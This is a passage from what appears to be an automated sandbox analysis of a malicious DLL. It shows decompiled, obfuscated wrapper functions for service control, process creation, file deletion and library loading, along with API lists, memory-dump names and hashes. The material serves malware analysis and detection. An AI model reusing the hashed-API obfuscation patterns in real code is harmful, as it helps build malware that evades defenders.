					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}

0x10001984
0x10001989
0x10001a09
0x10001a09
0x1000198f
0x10001993
0x100019a0
0x100019a0
0x100019a6
0x100019e2
0x100019e2
0x100019e7
0x100019f1
0x100019f1
0x00000000
0x100019a8
0x100019a9
0x100019ae
0x100019cc
0x100019cc
0x100019d2
0x100019dc
0x100019dc
0x00000000
0x00000000
0x00000000
0x00000000
0x100019b0
0x100019b0
0x100019b3
0x100019b8
0x100019c1
0x100019c3
0x100019c3
0x100019c6
0x100019c7
0x00000000
0x100019b0

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapVirtual$Process
String ID:
API String ID: 3505259878-0
Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2788 Parent PID: 2328 rundll32.exeCOMMON

Executed Functions

Function 00322959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00322959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0032602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E003307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0032295f
0x00322964
0x00322967
0x0032296a
0x0032296d
0x0032296e
0x0032296f
0x00322977
0x00322985
0x0032298a
0x00322992
0x0032299a
0x003229a2
0x003229a9
0x003229b0
0x003229b7
0x003229bb
0x003229cf
0x003229dc
0x003229e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 003229DC

Strings

<^, xrefs: 00322977

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 19e97f6840cba346f27175bbd0f6707e73230624cb8d0afad74871b51518aa88
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 4A018072A00108BFEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0032C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0032C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0032602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E003307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0032c6e1
0x0032c6e6
0x0032c6f0
0x0032c6fc
0x0032c703
0x0032c706
0x0032c70d
0x0032c711
0x0032c715
0x0032c71c
0x0032c723
0x0032c72a
0x0032c731
0x0032c738
0x0032c751
0x0032c762
0x0032c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0032C762

Strings

/O, xrefs: 0032C6E6

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: c440427603abae4b40e5aa15c3b7e6cc0b4f57c7c545ff541deaa90d690fa6e6
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 7B1133B290122DBBCB25DF94DC4A8DFBFB8EF04714F108188F90966210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00321000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00321000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0032602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E003307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00321006
0x00321009
0x0032100c
0x00321011
0x00321016
0x0032101d
0x00321026
0x0032102d
0x00321034
0x0032103b
0x00321047
0x0032104f
0x00321057
0x0032105e
0x00321065
0x0032106c
0x00321073
0x00321077
0x0032108b
0x00321096
0x0032109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00321096

Strings

[, xrefs: 0032103B

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: b31de7921f170618207fbfc8623610397a7294220898ff5d299751b84dde1968
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: BC016DB6D0130CFBDF04DFA4C94A5DEBBB1EF54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00324859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00324859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E003307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0032485e
0x0032487a
0x0032487d
0x00324884
0x0032488b
0x00324892
0x0032489d
0x003248a0
0x003248ad
0x003248b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 003248B7

Strings

[, xrefs: 0032488B

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: ece2571b35b6db8ed5a81b511bcffbede777eaf0b86dffbdfcb25762da1102d0
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 3FF01D70905209FBDB04CFE8C95699EBFB5EB40301F20818CE444B7290E3715F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00334F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00334F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E003307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00334f80
0x00334f81
0x00334f82
0x00334f86
0x00334f87
0x00334f8c
0x00334fa5
0x00334fa8
0x00334faf
0x00334fb6
0x00334fc7
0x00334fca
0x00334fd7
0x00334fe2
0x00334fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00334FE2

Strings

{#lm, xrefs: 00334FC2

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 00638327ed37fc23e984292654fae3d78636a32fd06e166a9b5081f87cfe901e
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: E3F037B081120CFFDB09DFA4D98289EBFBAEF40300F208199E805BB250D3715B50AB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0033976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0032602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E003307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00339772
0x00339773
0x00339778
0x0033977a
0x0033977b
0x0033977e
0x0033977f
0x00339782
0x00339785
0x00339788
0x00339789
0x0033978c
0x0033978f
0x00339790
0x00339791
0x00339794
0x00339797
0x0033979a
0x0033979d
0x003397a0
0x003397a3
0x003397a6
0x003397a7
0x003397a8
0x003397ad
0x003397b7
0x003397c3
0x003397ca
0x003397d1
0x003397d8
0x003397df
0x003397e3
0x003397fc
0x00339816
0x0033981d

APIs

CreateProcessW.KERNEL32(0032591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0032591A), ref: 00339816

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: dbcc302de3bebab8907db47c7b5197216a766566c5772b33908ae9f1b79e2d07
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: CD11B072901188BBDF1A9F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0032B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0032B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0032602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E003307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0032b569
0x0032b56a
0x0032b56d
0x0032b572
0x0032b574
0x0032b577
0x0032b57a
0x0032b57d
0x0032b580
0x0032b583
0x0032b586
0x0032b587
0x0032b58a
0x0032b58d
0x0032b590
0x0032b593
0x0032b594
0x0032b595
0x0032b59a
0x0032b5a4
0x0032b5b8
0x0032b5c0
0x0032b5c4
0x0032b5cb
0x0032b5d2
0x0032b5d9
0x0032b5e6
0x0032b5fd
0x0032b604

APIs

CreateFileW.KERNELBASE(00330668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00330668,?,?,?,?), ref: 0032B5FD

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6c416353649b2b949d2294600e5a6d6175570f14fccfb6900620e6028caf9356
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: BB11C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1866120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0033981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0032602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E003307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00339821
0x00339822
0x00339825
0x00339828
0x0033982a
0x0033982c
0x0033982f
0x00339832
0x00339835
0x00339836
0x00339837
0x0033983c
0x00339855
0x00339858
0x0033985f
0x00339866
0x0033986d
0x00339874
0x0033987b
0x0033988e
0x0033989b
0x003398a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,003287F2,0000CAAE,0000510C,AD82F196), ref: 0033989B

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 882b047e0b8c691595c99f57648ad4cd1bf479c64f084ef36e1bf1a07758706e
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 94015E76801208FBDB04EFD5D846CDF7F79EF85750F108199F91866220E6715B519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00337BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00337BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E003307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00337bf7
0x00337bf8
0x00337bfa
0x00337bfd
0x00337bff
0x00337c02
0x00337c06
0x00337c07
0x00337c0f
0x00337c1d
0x00337c25
0x00337c2d
0x00337c31
0x00337c38
0x00337c3f
0x00337c46
0x00337c4a
0x00337c5e
0x00337c67
0x00337c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00337C67

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 2188f20a30939c63e280c71eb57948b323243b5a27d3f4b2b183f5446dc54e1e
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 31014FB190120CFFEB09DFA4D84A8DE7BB5EF44314F108198F40567240E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0032F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0032F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E003307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0032f662
0x0032f663
0x0032f665
0x0032f668
0x0032f66a
0x0032f66d
0x0032f670
0x0032f673
0x0032f677
0x0032f678
0x0032f67d
0x0032f687
0x0032f693
0x0032f69a
0x0032f6a1
0x0032f6a5
0x0032f6a9
0x0032f6b0
0x0032f6c9
0x0032f6d8
0x0032f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0032F6D8

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 14cd549d81f5a4aad57bf66395f6df235c9210f6b51b667cb09491cffb11bdeb
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 8A01E5B6901208BBEF059F94DC468DF7F75EB05324F148188F90566250D6B25E21EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0032B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0032B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0032602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E003307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0032b6f3
0x0032b6f8
0x0032b702
0x0032b70b
0x0032b712
0x0032b719
0x0032b720
0x0032b727
0x0032b72e
0x0032b747
0x0032b759
0x0032b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0032B759

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: b1fb7ec0163074bcc2695c772f7c0628010282a4d2c3f7a28c852ca3c4ceb2ba
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 79014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA056A190D3B25E20AB51

Uniqueness

Uniqueness Score: -1.00%

Function 0033AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0033AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E003307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0033aa3f
0x0033aa40
0x0033aa41
0x0033aa44
0x0033aa47
0x0033aa4b
0x0033aa4c
0x0033aa51
0x0033aa5b
0x0033aa64
0x0033aa68
0x0033aa6f
0x0033aa76
0x0033aa8d
0x0033aa90
0x0033aa9d
0x0033aaa8
0x0033aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0033AAA8

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 67e5fdf6b063f4cc5e186f573967d7081333722a884dc9e1442ebf469f84436e
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 61F069B190020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00325FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

